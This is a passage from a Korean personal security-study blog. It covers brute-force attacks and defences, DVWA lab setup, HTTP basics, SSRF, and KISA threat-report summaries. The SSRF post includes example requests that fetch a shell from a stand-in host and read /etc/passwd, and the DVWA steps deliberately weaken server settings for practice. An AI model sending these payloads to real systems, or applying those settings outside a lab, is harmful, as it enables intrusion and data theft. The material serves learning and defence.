- 로그인에 성공한 후 세션 식별자를 재사용합니다.
- 세션 ID를 올바르게 무효화하지 않습니다. 사용자 세션 또는 인증 토큰(주로 SSO(Single Sign-On) 토큰)은 로그아웃 또는 비활성 기간 동안 적절하게 무효화되지 않습니다.

공격 사례

보안뉴스, https://www.boannews.com/media/view.asp?idx=70835

2. 자동화 도구

- Hydra: 네트워크 서비스 및 웹 로그인 크래킹에 사용

- John the Ripper: 암호 해시 크래킹에 특화된 도구

- Medusa: 병렬로 빠르게 로그인 공격을 실행할 수 있는 도구

- Burp Suite: 웹 애플리케이션 보안 테스트 도구로, 무차별 대입 공격을 구성 가능

3. 공격 유형

- 단순 무차별 대입 공격 : 가능한 모든 조합을 순차적으로 시도. 보안 설정이 약하거나 짧고 간단한 비밀번호를 사용하는 시스템에 효과적

- 사전 공격(Dictionary Attack) : 사전에 준비된 일반적인 비밀번호 목록을 이용. (대부분의 사람들은 완전히 무작위적인 비밀번호를 사용하지 않기 때문)

- 하이브리드 공격 : 사전 공격과 단순 무차별 대입 공격을 결합한 형태. 사전에 저장된 단어에 숫자나 특수문자를 추가하여 조합을 시도

4. 방어 방법

- 강력한 비밀번호 정책 : 비밀 번호를 길고 복잡하게 설정

- 로그인 시도 제한 : 일정 횟수 이상 비밀번호를 틀리면 계정 잠금

- 캡차(CAPTCHA) 도입 : 로그인 과정에서 캡차를 추가하여 자동화된 공격 방지

- 이중인증(2FA) : 비밀번호 이외에 추가 인증 단계를 요구.

https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks

Blocking Brute Force Attacks | OWASP Foundation

Blocking Brute Force Attacks on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.

owasp.org

https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/

A07 Identification and Authentication Failures - OWASP Top 10:2021

A07:2021 – Identification and Authentication Failures Factors CWEs Mapped Max Incidence Rate Avg Incidence Rate Avg Weighted Exploit Avg Weighted Impact Max Coverage Avg Coverage Total Occurrences Total CVEs 22 14.84% 2.55% 7.40 6.50 79.51% 45.72% 132,19

owasp.org

[웹 보안] DVWA 설치하기

제나나 — Sun, 12 Jan 2025 08:02:55 +0900

[웹 보안] DVWA 설치하기

*이글은 과거에 DVWA로 실습했던 글을 다시올리는거여서 현재 버전과 맞지 않을 수 있음*

1. DVWA 개요

DVWA(Damn Vunlerable Web Application)은 취약한 웹 어플리케이션으로 웹 모의해킹을 연습하기 위한 어플리케이션
DVWA는 리눅스기반의 OS에서 `Apache` + `PHP` + `MySQL(또는 MariaDB)`로 이루어져있다.

2. Kali Linux에 DVWA 설치하기

Kali Linux 설치하기

1) https://www.kali.org/downloads/ 에서 ios다운

2) Oracle VM VirtualBox에 ios파일을 넣어서 설치

DVWA 설치하기

1) 설치파일 다운받기

www.dvwa.co.uk 홈페이지에서 `DVWA-1.9.zip` 파일 다운로드 (요즘은 github를 통해 다운해서 사용. 링크:https://github.com/digininja/DVWA)
`/root/Downloads` 로 파일이 다운되면 해당 디렉터리로 이동
압축 해제 `unzip DVWA-1.9.zip`

2) DVWA 폴더 이름 변경 및 apache2 디렉토리 이동, 권한 주기

`mv DVWA-1.9 dvwa` DVWA-1.9 디렉토리 이름을 dvwa로 변경
`mv dvwa/ /var/www/html` dvwa 디렉토리를 /var/www/html로 이동시킴
`cd /var/www/html`
`chmod -R 755 /var/www/html/dvwa/` 권한 설정

3) `config.inc.php` 파일 수정하기

`cd /var/www/html/dvwa/config` 로 이동
`vi config.inc.php` 파일 수정
`db_password` 부분은 ''(공백)으로 만든다

4) dvwa database 만들기

`service mysql restart`로 mysql 재시작
`mysql -u root -p` user는 root password는 없음 (Enter만 입력)
`create database dvwa;`로 dvwa라는 database를 만듦
`show databases;`

5) curl 사용하기

`curl --data 'create db=create+%2F+Reset+Database'`
http://127.0.0.1/dvwa/setup.php# --cookie PHPSESSID=1
`service apache2 restart`로 apache 재시작

6) DVWA 웹 접속

127.0.0.1/dvwa/login.php 또는 localhost/dvwa/login.php로 접속
id : admin / pw : password

3. 그외 DVWA 설치 환경 조성하기

Setup/ Reset DB에서 Disabled된 화면을 볼 수 있다.
`chmod 777 -R /var/www/html/dvwa/hackable/uploads`
`chmod 666 /var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt`
`vi /etc/php/7.0/apache2/php.ini`에서 allow_url_include=Off > On으로 변경
`sudo apt-get install php7.0-gd` (php기 5.x 버전이면 `sudo apt-get install php5-gd`)
reCAPTCHA key는 https://www.google.com/recaptcha/admin/create 에서 만들어서 `/var/www/html/dvwa/config`에 있는 `config.inc.php`의 `recaptcha_public_key`와 `recaptcha_private_key`에 넣어주기

[WEB] 웹의 이해

제나나 — Sun, 12 Jan 2025 01:30:23 +0900

웹의 이해

1. HTTP란?

HTTP는 OSI 7계층에 속하는 프로토콜로 우리가 흔히 아는 웹페이지에 접속할때 사용하는 프로토콜이다.

URL

웹 리소스에 접근하기 위해서 사용하는 주소로, 인터넷 상에서 리소스를 식별하고 위치를 지정하는 역할을 한다.

프로토콜://호스트이름:포트번호/경로?파라미터
ex) http://example.com/login.jsp?id=test

프로토콜 : http://또는 https://로 시작하고, URL에서 사용하는 프로토콜을 나타낸다.
호스트이름 : 도메인이름 또는 IP주소를 통해 서버의 위치를 지정한다.
포트번호(선택사항) : 요청이 전송되는 네트워크의 포트를 지정. 기본적으로 생략가능하며, 생략 시 HTTP는 80, HTTPS는 443포트를 사용한다.
경로 : 서버의 리소스를 식별하기 위한 경로이다.
파라미터 : 파일에 전달되는 값을 뜻한다.

2. HTTP 구조

클라이언트와 서버 간의 요청 및 응답을 통해 데이터를 전송하는 프로토콜은 요청(Request)와 응답(Response) 메시지로 구성되어 있다.

HTTP Request 구조

클라이언트가 서버에게 리소스를 요청할 때 사용된다.

1) 요청 줄 (Reuest Line)

Method : 요청의 동작을 정의

URL : 요청 리소스의 경로

HTTP 버전 : HTTP 프로토콜의 버전(예: HTTP/1.1, HTTP/2)

Method	설명
GET	서버에서 특정 리소스를 조회할 때 사용
POST	서버에 데이터를 전송하고 처리 요청을 할 때 사용
PUT	서버에 지정된 리소스를 생성하거나 기존 리소스를 완전히 교체
DELETE	서버에서 특정 리소스를 삭제
HEAD	GET요청과 동일하지만, 응답 본문을 제외하고 헤더 정보만 반환
OPTIONS	특정 URL에서 사용할 수 있는 매소드 목록을 확인
PATCH	서버의 기존 리소스의 일부를 수정
TRACE	요청이 서버까지 도달하는 경로를 테스트하기 위해 사용
CONNECT	프록시 서버를 통해 TCP 터널을 설정

Method 중에서 가장 많이 사용되는 GET과 POST 비교이다.

항목	GET	POST
목적	데이터 조회	데이터 전송, 생성
데이터 전달 위치	URL의 쿼리 문자열	HTTP 요청 Body
데이터 크기 제한	URL 길이 제한 존재 (2,048자 등 브라우저/서버에 따라 다름).	사실상 데이터 크기 제한 없음 (서버 설정에 따름).
보안	데이터가 URL에 노출됨.	데이터가 URL에 노출되지 않음. (HTTPS 사용 시 더 안전)
캐싱 가능성	기본적으로 캐싱 가능.	기본적으로 캐싱되지 않음.
북마크 가능성	URL에 데이터가 포함되어 있으므로 가능.	본문 데이터를 전송하므로 불가능.
반복 요청 처리 *** Idempotent(멱등성): 동일 요청 여러 번 보내도 동일한 결과.	멱등성 보장	멱등성이 보장되지 않을 수 있음.
속도	상대적으로 빠름.	상대적으로 느림.

2) 헤더(Header)

요청의 추가 정보를 전달

Host: 응답을 요청하는 호스트

User-Agent: 응답 내용에 대해 응답할 수 있는 브라우저의 종류

Accept: 클라이언트가 처리 가능한 콘텐츠 유형을 서버에 알림

Accept-Encoding : 클라이언트가 지원하는 압축 방식을 지정

Accept-Language: 응답에 대해 선호하는 언어

Authorization : 서버에 인증 정보를 전달

Cookie: 클라이언트가 서버에 쿠키 데이터를 전달

Referer: 요청을 보낸 이전 페이지의 URL

Content-Type : 요청 본문의 MIME 타입을 지정

MIME은 클라이언트와 서버 간 데이터의 콘텐츠 유형을 지정하는데 사용됩니다. HTTP 요청 또는 응답의 Content-type 헤더를 통해 MIME의 타입이 전달된다.

[MIME 타입의 구조]
type/subtype
type : 콘텐츠의 주요 카테고리를 나타낸다.
subtype : 콘텐츠의 세부 유형을 나타낸다.

1. text/ 텍스트 데이터와 관련된 콘텐츠
예) text/plain : 일반 텍스트, text/html : HTML 문서
2. image/ 이미지 파일
예) image/png : PNG 이미지, image/jpeg : JPEG 이미지
3. audio/ 오디오 파일
예) audio/mp3 : mp3파일
4. video/ 비디오 파일
예) video/mp4 : mp4파일
5. application/ 구조화된 데이터 또는 실행 가능한 콘텐츠
예) application/json : JSON 데이터, application/xml : XML 데이터, application/zip : ZIP 압축 파일
6. multipart/ 여러 개의 다른 MIME 타입 데이터를 포함하는 콘텐츠. 일반적으로 파일 업로드 같은 상황에서 사용된다.
예) multipart/form-data : HTML 양식의 데이터, multipart/alternative : 여러 표현의 이메일 메시지
7. message/ 메시지와 관련된 MIME 타입
예) message/rfc822 : 이메일 메시지
8. font/ 폰트 파일
예) font/woff : WOF 폰트 파일

Content-Length :요청 본문의 길이를 바이트 단위로 지정

Content-Encoding : 요청 본문이 압축되었음을 나타냄

Cache-Control : 클라이언트 또는 서버가 요청에 대해 캐싱 동작을 지정

If-Modified-Since : 지정된 날짜 이후에 변경된 리소스만 요청

ETag : 서버가 리소스의 특정 버전을 식별하는 태그

Connection : 연결 유지 여부를 나타낸다.

Proxy-Connection: 프록시 연결을 사용

3) 빈줄(CRLF)

헤더와 본문을 구분하는 빈줄(\r\n)

4) 본문(Body)

POST, PUT 등의 Method에서 요청 데이터를 포함

✔ GET 요청 예시 :

GET /login.jsp?id=test&password=1234 HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionId=abc123; theme=light

✔ POST 요청 예시 :

POST /login.jsp HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Connection: keep-alive
Cookie: sessionId=abc123; theme=light

id=test&password=1234

HTTP Response 구조

1) 상태 줄(Status Line)

HTTP 버전 : 사용하는 HTTP 프로토콜 버전

상태 코드(Status Code) : 요청 처리 결과를 나타내는 숫자

상태 메시지(Status Message) : 상태 코드를 설명하는 텍스트 메시지

1xx 정보제공

100 Continue 요청이 초기 검증을 통과했으며, 계속 진행해도 됩니다.

101 Switching Protocol 서버 프로토콜 변경 요청을 승인했습니다.

103 Early Hints 캐시 사전 로딩 정보를 제공합니다.

2xx 성공

200 OK 요청이 성공적으로 처리되었습니다.

201 Created 요청으로 인해 새로운 리소스가 생성되었습니다.

202 Accepted 요청이 수락되었지만, 아직 처리되지 않았습니다.

204 No Content 요청은 성공했지만, 응답 본문이 없습니다.

206 Partial Content 부분 콘텐츠 요청이 성공적으로 처리되었습니다.

3xx 리다이렉션

301 Moved Permanently 리소스가 영구적으로 새로운 URL로 이동했습니다.

302 Found 리소스가 임시적으로 다른 URL에서 제공합니다.

303 See Other 리소스를 다른 URL로 조회해야 합니다.

304 Not Modified 클라이언트의 캐시된 리소스가 여전히 유효합니다.

307 Temporary Redirect 임시적으로 다른 URl로 리다이렉션됩니다.

308 Permanent Redirect 영구적으로 다른 URL로 리다이렉션됩니다.

4xx 클라이언트 오류

400 Bad Request 잘못된 요청 형식으로 인해 서버가 요청을 이해하지 못했습니다.

401 Unauthorized 인증이 필요합니다.

403 Forbidden 요청은 이해되었지만, 권한이 없어 거부되었습니다.

404 Not Found 요청한 리소스를 찾을 수 없습니다.

405 Method Not Allowed 요청 메서드가 허용되지 않습니다.

408 Request Timeout 서버가 요청을 기다리다 시간 초과되었습니다.

5xx 서버 오류

500 Internal Server Error 서버에서 알 수 없는 오류가 발생했습니다.

501 Not Implemented 서버가 요청된 기능을 지원하지 않습니다.

502 Bad Gateway 서버가 잘못된 게이트웨이 응답을 받았습니다.

503 Service Unavailable 서버가 과부하 상태이거나 유지보수 중입니다.

504 Gateway Timeout 게이트웨이 또는 프록시 서버가 응답 시간 초과되었습니다.

505 HTTP Version Not Supported 서버가 요청된 HTTP 버전을 지원하지 않습니다.

2) 헤더(Header)

응답의 메타데이터를 포함하며, 콘텐츠 타입, 서버 정보, 캐싱 정책 등을 전달한다.

Data: 응답이 생성된 날짜와 시간

Cache-Control : 캐싱 동작을 제어합니다. (예: Cache-Control: no-cache)

Connection: 현재 연결을 유지할지 종료할지 설정

Via : 요청에서 클라이언트와 서버, 통신 중간에 프로토콜과 수신자

Age : 서버에서 생성된 페이지에 대한 예상 시간

Server: 응답 서버 정보

Retry-After : 서버가 일정 시간 후 요청을 다시 시도하라고 알림.

Accept-Ranges: 클라이언트가 요청한 리소스의 특정 범위를 지원할지 여부를 나타낸다.

Etag: 리소스의 고유 식별자

Last_Modified: 최근 응답 페이지 수정일

Expires: 내용이 만료되는 것으로 예상 시간

Vary : 클라이언트의 요청 헤더에 따라 응답이 달라지는 조건을 명시

Content-Type : 응답 데이터의 MIME 타입을 정의

Content-Length : 응답 본문의 바이트 크기

Content-Encoding : 본문 데이터가 어떤 인코딩 방식으로 압축되었는지 나타닌다.

Content-Language : 응답 본문에 사용된 언어를 나타냄.

Content-Disposition : 응답 데이터를 어떻게 처리할지 나타낸다. (예: Content-Disposition: attachment; filename="file.pdf")

Set-Cookie : 클라이언트에 쿠키를 설정

Location : 클라이언트를 리다이렉션할 URL을 나타낸다.

Strick-Transport-Security (HSTS) : HTTPS 연결을 강제

X-Content-Type-Options : 브라우저의 MIME 타입 스니핑을 방지

X-Frame-Options : 클릭재킹을 방지하기 위해 프레임 내 삽입을 제어

Content-Security-Policy (CSP) : 리소스를 제한하여 XSS 공격을 방지

3) 빈줄(CRLF)

헤더와 본문을 구분하는 빈줄(\r\n)

4) 본문(Body)

서버가 클라이언트에 반환하는 데이터로, HTML, JSON, XML, 이미지 등 다양한 형식일 수 있다.

✔ 성공 응답 예시

HTTP/1.1 200 OK
Date: Sat, 12 Jan 2025 10:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
Connection: keep-alive
Set-Cookie: sessionId=xyz789; HttpOnly; Path=/; Max-Age=3600

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login Successful</title>
</head>
<body>
    <h1>Welcome, test!</h1>
    <p>You have successfully logged in.</p>
</body>
</html>

✔ 리다이렉션 응답 예시

HTTP/1.1 301 Moved Permanently
Location: https://www.newdomain.com/newpage
Date: Sat, 12 Jan 2025 10:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: keep-alive

헤더 예시

3. HTTP 특징

- 비연결 지향(Connectionless)

HTTP요청은 독립적으로 처리되고 이전의 연결 상태를 유지하지 않음.

클라이언트가 서버에 요청을 보내고 서버가 응답을 보내면 그 즉시 연결이 종료.

- 비상태성(Stateless)

각 요청 간의 상태 정보가 유지되지 않으며, 이전 요청에 대한 정보를 기억하지 않음.

Session, Cookie, JWT 등을 활용하여 상태를 유지할 수 있도록 함.

[KISA] TTPs#2 스피어 피싱으로 정보를 수집하는 공격망 구성 방식 분석

제나나 — Sat, 4 Jan 2025 02:22:08 +0900

TTPs#2

스피어 피싱으로 정보를 수집하는 공격망 구성 방식 분석

출처 : KISA 보호나라, https://boho.or.kr/kr/bbs/view.do?searchCnd=1&bbsId=B0000127&searchWrd=TTPs&menuNo=205021&pageIndex=2&categoryCode=&nttId=35471

KISA 보호나라&KrCERT/CC

www.boho.or.kr

1. 서론
2. 개요
3. ATT&CK Matrix
- Initial Access : 최초 침투
- Execution : 실행
- Persistence : 지속성 유지
- Privilege Escalation : 권한 상승
- Defense Evasion : 방어 회피
- Credential Access : 계정정보 접근
- Discovery : 탐색
- Collection : 정보 수집
- Lateral Movement : 시스템 내부 이동
- Command and Control : 명령제어
- Exfiltration : 정보 유출
- Impact : 시스템 충격
4. 악성코드 상세 분석
5. 결론
6. Yara rule

개요

ⓛ 공격 준비

먼저 공격자는 다수 홈페이지를 운영 중인 호스팅 서버를 장악하여 거점으로 활용한다. TTPs#1 보고서에 서술된 바와 같이 취약한 홈페이지를 통해 웹셸을 업로드하고 호스트 시스템의 취약점을 공격하여 권한 상승을 시도한다. 시스템의 관리자 권한을 획득하는데 성공하면 웹 소스코드 변조, 데이터베이스 접근 등의 모든 행위가 가능해진다.

② 공격 대상에게 스피어 피싱 발송

거점을 확보한 공격자는 공격 대상을 선정한다. 외부에 노출된 메일 주소를 수집하고 공격 대상의 업무와 밀접한 내용으로 메일을 작성한다. 신뢰할 수 있도록 꾸민 메일을 발송하여 악성코드가 담긴 첨부 파일 열람을 유도하거나 취약한 웹 사이트에 접속하도록 유도한다. 그렇기 때문에 IT 관련 실무자보다는 외부인과의 접촉이 많은 인사, 영업 등의 담당자들이 공격에 보다 쉽게 노출된다.

③ 최초 침투

공격자는 공격 대상을 감염시킬 때 두 가지 방법을 사용한다. 첫번째는 악성 한글 문서 파일을 첨부하는 방법이고, 두번째는 공격 준비 단계에서 확보한 거점에 취약점 코드를 삽입하고 접속을 유도하는 방식이다.

Spearphishing Attachment : 메일에 악성코드 첨부

Spearphishing Link : 메일에 악성 사이트 링크 삽입

Drive-by Compromise : 웹 사이트 접속 시 악성코드 감염

Exploit Public-Facing Application : 공개된 어플리케이션 취약점 악용

④ 시스템 정보 수집

최초 침트에 성공하게 되면 네트워크 정보, 호스트 이름 등의 기본적인 시스템 정보를 수집한다. 이후 확보된 권한 및 내부 네트워크 구조를 파악하고 추가 악성행위 여부를 결정한다. 공격자는 감염된 시스템에 추가 악성코드 설치와 명령 결과 수집을 보다 원활하게 수행하기 위해 원격에 있는 공격자의 드라이브를 감염 시스템에 연결하기도 한다.

⑤ 권한 상승

공격자는 최초 침투 시 제한된 권한을 가지며 보다 많은 작업을 수행하기 위해 관리자 권한을 필요로 한다. 따라서 권한 상승 취약점을 유발하는 악성코드 또는 도구 등을 이용한다.

⑥ 지속성 확보

최초 침투에 성공하였다 하더라도 감염 기기가 재부팅되거나 예기치 못한 프로세스 충돌 등으로 악성코드가 종료되어 침투 경로를 잃을 수 있다. 이를 방지하기 위해 악성코드가 다시 실행 될 수 있도록 서비스 등록, 시작 프로그램 설정, 작업 스케줄러 등록, 웹셸 삽입 등의 행위를 한다.

⑦ 내부 정보 수집

본격적으로 악성코드를 통해 감염 긱기의 내부 기밀문서, 전체 네트워크 구조, 계정 크리덴셜 정보 등을 수집한다. 이때 공격자는 효율적이고 간편한 정보 수집, 백신 탐지 회피 목적으로 정상 프로그램을 사용하기도 한다.

⑧ 내부 전파

기존에 수집한 계정정보를 이용하여 공유된 네트워크에 접속을 시도한다. 이후 중요 정보가 담긴 주요 시스템까지 도달하기 위해 ' ④ 시스템 정보 수집 ~ ⑦ 내부 정보 수집'까지의 과정을 반복 수행한다. 망분리 정책이 적용되어있을 경우 외,내부간의 접점이 되는 시스템(망연계 솔루션, DRM 솔루션 등)을 찾고 해당 시스템의 취약점을 발굴하여 공격을 시도하기도 한다.

⑨ 흔적 삭제

공격에 사용되었던 악성코드와 사용한 도구들은 즉시 삭제하여 흔적을 지운다. 이때 지속성 확보를 위해 설치한 악성코드는 제외한다.

TTPs_2_스피어_피싱으로_정보를_수집하는_공격망_구성_방식.pdf

10.06MB

KrCERT Operation BookCode Yara Rule V2.yar

0.01MB

[웹 보안] SSRF 취약점

제나나 — Fri, 27 Dec 2024 08:32:11 +0900

[웹 보안] SSRF 취약점

Server-Side Request Forgery

1. 개요

SSRF 공격은 2021년 OWASP TOP10에 새로 추가된 항목이다.

서버 측에서 위조된 HTTP요청을 발생시켜 직접적인 접근이 제한된 서버 내부 자원에 접근하여 외부로 데이터 유출 및 오동작을 유발하는 공격을 SSRF(Server-Side Request Forgery)라고 한다.
공격이 발현되는 시점이 CSRF는 클라이언트 측이고, SSRF는 서버 측인 것이 차이점이다.
CSRF는 웹 브라우저 하이재킹을하여 사용자로 하여금 악성 요청을 수행하도록 한다면, SSRF는 접근이 제한된 내부환경에 추가 공격이 가능하기 때문에 공격 영향도가 높다.

2. SSRF 공격 예시

정상 요청 :

GET https://test.com/id?content=dashboard.php

악성 사이트 연결 (FILE Inclusion) :

GET https://test.com/id?content=https://evilsite.com/shell.php

로컬에 존재하는 관리자 페이지 접근 :

GET https://test.com/id?content=http://localhost/administrator

호스트에서만 액세스할 수 있는 관리자 페이지에 액세스 하는 데 사용

로컬 파일 가져오기 :

GET https://test.com/id?content=file:///etc/passwd

file:/// 프로토컬 핸들러를 이용하여 로컬의 주요 파일을 가져오는 데 사용

출처 및 참고 :
https://www.igloo.co.kr/security-information/ssrf-%ec%b7%a8%ec%95%bd%ec%a0%90%ec%9d%84-%ec%9d%b4%ec%9a%a9%ed%95%9c-%ea%b3%b5%ea%b2%a9%ec%82%ac%eb%a1%80-%eb%b6%84%ec%84%9d-%eb%b0%8f-%eb%8c%80%ec%9d%91%eb%b0%a9%ec%95%88/

SSRF 취약점을 이용한 공격사례 분석 및 대응방안

01. SSRF 개요 서버 측에서 위조된 HTTP 요청을 발생시켜 직접적인 접근이 제한된 서버 내부 자원에 접근하여 외부로 데이터 유출 및 오동작을 유발하는 공격을 SSRF(Server Side Request Forgery)라고 한다.

www.igloo.co.kr

https://beaglesecurity.com/blog/article/server-side-request-forgery-attack.html

Server Side Request Forgery Attack

A server-side request forgery attack lets an attacker send crafted requests from the back-end server of a vulnerable web application to target internal systems.

beaglesecurity.com

[KISA] 2025년 사이버 위협 전망

제나나 — Wed, 25 Dec 2024 07:40:06 +0900

[KISA] 2025년 사이버 위협 전망

1. 2024년 사이버 위협 사례 분석

1. 사이버 사기로 인한 국민 불편 및 금융피해 지속

[주요 사고 사례 및 동향]
• 기업 문자발송 시스템 및 계정 해킹을 통한 스팸문자 발송 주의(5월)
• ‘티몬·위메프’ 환불 미끼, 스미싱 주의··· 금융·개인정보 털린다(8월)
• 과태료 내려고 QR코드 열었더니... ‘큐싱’ 피해 당부 주의보(10월)
• 정부, 불법 쓰레기 편지(스팸) 방지 종합대책 발표(11월)

2. SW 공급망 공격은 기본, 복합적인 공격 전술 사용

* SW 공급망 공격은 신뢰받는 소프트웨어와 업데이트 체계를 악용해 SW 개발-유통-이용 등 SW 공급망 전단계에서 광범위하게 악성코드를 유포하고 보안 프로그램의 탐지를 회피할 수 있어, 사이버 공격자들이 선호하는 방식 중 하나다.

[주요 사고 사례 및 동향]
• 건설 관련 홈페이지의 보안 프로그램 설치 파일 변조(1월)
• 리눅스 오픈소스 압축 프로그램(XZ Utils) 최신버전에서 악성코드 발견(3월)
• 국내 무료 SW의 특정 토스트 팝업 광고 프로그램 악용(5월)

- 건설기술 부야 홈페이지 보안 프로그램 설치 파일 변조 : 홈페이지 로그인을위해서 필요한 보안 프로그램 설치 파일이 변조되어 악성코드가 유포된 사건/ 공격자는 공격 대상이 자주 방문하는 홈페이지에 잠복하여 악성코드를 퍼뜨리는 워터링홀 공격 기법 + 악성코드를 이용하여 국내 소프트웨어 개발사의 유표한 디지털 인증서를 탈취하여 믿을 수 있는 서비스로 위창하는 방법으로 백신을 회피하여 보안 프로글매 설치 파일을 변조하는 방식을 결합

- 리눅스 오픈소스 압축 프로그램(XZ Utils) 최신버전에서 악성코드 발견 : 리눅스 및 GNU 그룹에서 기본적으로 제공하는 데이터 압축 유틸리티(XZ Utils)의 최신버전(5.60, 5.61)에서 백도어가 발견. 공격자가 2021년부터 오픈소스 프로젝트에 참가하여 운영자와 신뢰를 쌓아서 의도적으로 악성코드를 삽입하여 배포

- 국내 무료 SW의 특정 토스트 팝업 광고 프로그램 악용 : 특정 토스트 광고 프로그램이 광고 콘텐츠를 내려받을 때 지원이 종료된 취약한 인터넷 익스플로러 모듈을 사용한다는 점을 노려 국내 특정 기업의 토스트 팝업 광고 프로그램을 악용한 대규모 사이버 공격. 온라인 광고를 통해 악성코드를 유포하는 멀버타이징(Malvertising) 공격 기법과 지원이 종료된 마이크로소프트의 윈도우 익스플로러 브라우저의 제로데이 취약점을 결합하여 사이버 공격에 악용
* 토스트 : 사용자의 화면에 일시적으로 표시되고 작고 간단한 메시지 형태의 팝업 광고

3. 랜섬 공격기법 고도화, 고객 정보 빌미로 삼중 갈취 공격 지속

[주요 사고 사례 및 동향]
• 1분기 랜섬웨어 공격 23% 증가... 보안 시스템 우회·합법적 도구 악용 증가(5월)
• 해커 “법무법인 해킹 후, 탈취한 고객정보 공개 협박” 비트코인 요구(9월)
• 상반기 랜섬웨어 피해 비용 평균 20억···진입장벽 낮아지고 방식 고도화(11월)

보안 장비 탐지 우회와
① 데이터 암호화에 그치지 않고,
② 기업의 기밀 자료를 유출하고 공개를 협박하며,
③ 피해 기업에 대해 디도스(DDoS) 공격 등 3중 갈취 전술을 사용하는 고도화된 공격 기법 이용

2. 2025년 사이버 위협 전망

1. 공격자의 생성형 AI 활용 본격화

• 생성형 AI의 악용이 본격화되며 사이버 범죄 도구로 활용될 가능성 증가
• 기업의 안전한 생성형 AI 사용을 위해 보안 내재화, 보안 모니터링 체계 필요
• 사회적 갈등과 혼란을 부추기는 가짜뉴스 및 게시글을 통한 여론조작 우려

2. 디지털 융복합 시스템에 대한 사이버 위협 증가 예상

• 스마트팜, 스마트축산 등 디지털 융복합 시스템을 겨냥한 사이버 공격 확대
• 5G 특화망(이음5G) 활용 확대에 따른 스마트시티 등 사이버 위협 우려
• 주기적인 공격 표면 관리(ASM)로 위험 요소 제거 및 IoT 기기의 보안 강화 필요

3. 글로벌 환경 변화에 따른 사이버 위협 증가 가능성

• 트럼프 2기 행정부의 자국 우선주의, 가상자산 등 정책 변화에 따른 혼란 예상
• 국가배후 공격그룹과 핵티비스트 그룹의 공격 확대 우려
• 국가 안보실을 중심으로 민·관·군의 사이버 위협 대응 및 협력체계 강화 필요

4. 무차별 디도스 공격 증가 예상

• 핵티비스트 등 다양한 목적의 무차별 디도스 공격 시도 증가 예상
• 보안에 취약한 라우터 장비 대상 디도스 봇넷 구축 우려
• KISA “디도스 사이버대피소”를 활용한 중소기업의 대응체계 강화 필요

2025년 사이버 위협 전망.pdf

4.71MB

출처 : https://boho.or.kr/kr/bbs/view.do?bbsId=B0000127&pageIndex=1&nttId=71610&menuNo=205021

KISA 보호나라&KrCERT/CC

www.boho.or.kr

[KISA] 사이버 위협 동향 보고서(2024년 상반기)

제나나 — Tue, 24 Dec 2024 23:11:10 +0900

[KISA] 사이버 위협 동향 보고서(2023년 하반기)

- 한국인터넷진흥원(KISA)에서 발간 보고서

Part1. 사이버 위협 동향

1-1. 침해사고 신고 현황

1-2. 사이버 위협 분석

1) 블록체인 개발업체 가상자산 유출 - 취약한 계정관리와 피싱메일을 통한 무차별적인 가상자산탈취공격

2) 공유기 악성코드 감염으로 인터넷망 장애 - 1월초 지역 인터넷케이블사업자의 서비스 구역에서 알 수 없는 원인으로 주말 동안 약4시간 가량 인터넷 접속 장애가 발생. 원인은 비정상 트래픽을 유발한 가입자 공유기가 사고 원인이였음. 인터넷 공유기나 NAS 등 IoT기기는 미라이(Mirai) 보 감염으로 인한 서비스 장애나 해킹 경유지로 악용 될 수 있음.

3) 미상 해커그룹 니옌, 과시 목적의 취약한 국내 홈페이지 해킹 공격 지속

4) 중국 IT기업으로 위장합 정부지원 해킹조직의 실체 - 아이순(i-Soon)이라는 중국 해킹단체

5) 금융대출사기 등으로 악용되는 알뜰폰 부정개통 사고 - 비대면 개통과정에서 부정개통이 이뤄지는 사고 발생. 보인확인 우회 취약점을 이용

6) 주요 기업 내부에 침투를 위한 오픈소스 SW 공급망 해킹 위협 - 신뢰에 기반하여 악성코드 삽입

7) 스미싱, 투자 유도 사기 등 서민경제를 위협하는 스팸문자 급증 - 원인 1. 해외 서비스를 이용한 스팸발생 증가, 윈인 2. 웹페이지 취약점을 악용하여 해당 서버에 저장된 개인정볼르 확보한 목표를 대상으로 대량문자 발송.

* 문자발송시스템에 침입하기 위해 자주 악용되는 공격 기법으로는

▲파일 업로드 페이지에서 파일 확장자 미검증 등 취약점을 이용해 공격자가 웹셸(백도어 악성코드)을 서버에 업로드하고 실행하는 방식,

▲SQL 인젝션 취약점을 악용한 비정상 질의 공격 방식

▲추측 가능하거나 쉬운 관리자 계정을 비밀번호 대입공격으로 획득하는 방식 등이 있다.

8) 랜섬웨어 공격의 기본, 피해 기업 자료를 공개하는 2차 피해증가

1-3. 사이버 위협 전망

1) 코인가치 상승에 따른 거래소 및 개인 대상 가상자산 탈취공격 지속

2) 기업의 내부 보안 강화를 우회하기 위한 SW 공급망 공격 지속

3) 파리 하계 올림픽, 미 대선 이슈 등을 악용한 피싱 공격 지속

Part2. 전문가 칼럼

2-1. KISA 이태승 연구위원

: ’24.8.14 시행 정보통신망법의 주요 개정내용과 의의

2-2. 법무법인(유한) 태평양 윤주호 변호사

: 가상자산 이용자 보호법, 사업자가 고려하여야 할 사항

2-3. 프라이빗테크놀로지 김영랑 대표

: 핵심 기술 융합과 실증 사례를 통해 살펴보는 제로 트러스트 전략

2-4. 한남대학교 이만희 교수

: SW 공급망 보안 가이드라인(1.0) 소개 및 발전 방향

2-5. S2W TALON

: 랜섬웨어 그룹의 주요 동향 및 위험도 평가

